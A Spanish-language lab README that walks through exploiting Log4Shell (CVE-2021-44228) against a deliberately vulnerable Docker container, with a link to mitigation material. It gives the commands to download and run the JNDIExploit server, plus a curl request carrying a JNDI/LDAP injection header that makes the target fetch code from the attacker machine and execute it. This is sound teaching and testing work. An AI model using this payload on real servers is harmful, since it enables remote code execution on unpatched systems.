
Este repositorio es para la demostración y mitigación de la vulnerabilidad Log4j 2021 (CVE-2021-44228).
Este repositorio es para la demostración y mitigación de la vulnerabilidad Log4j 2021 (CVE-2021-44228).
La vulnerabilidad CVE-2021-44228 / Log4Shell consiste en inyectar en software vulnerable una carga maliciosa, que pedirá a Log4J obtener un valor de una fuente de terceros, con JNDI y a través del protocolo LDAP. ... Los datos importados pueden ser código, que será ejecutado por Log4J en el sistema.
Ejecutamos una aplicación web Spring Boot vulnerable a CVE-2021-44228 en Docker, apodada Log4Shell por @christophetd.
Usa Log4j 2.14.1 (a través de spring-boot-starter-log4j2 2.6.1) y el JDK 1.8.0_181.
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Descargamos el JNDI Exploit para Log4Shell desde el archivo web en este caso, pero puedes descargarlo desde donde esté disponible.
wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

Obtenemos la dirección IP de nuestra máquina que está ejecutando el docker de la aplicación Log4Shell.
ifconfig

Descomprimimos el zip con el JNDI Exploit para Log4Shell, así obtenemos el JAR y lo ejecutamos poniendo nuestra IP obtenida en el paso 3.
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'


docker exec vulnerable-app ls /tmp

Video de cómo mitigar la vulnerabilidad Log4Shell en Windows y Linux: MITIGACIÓN

Feryael Justice 2022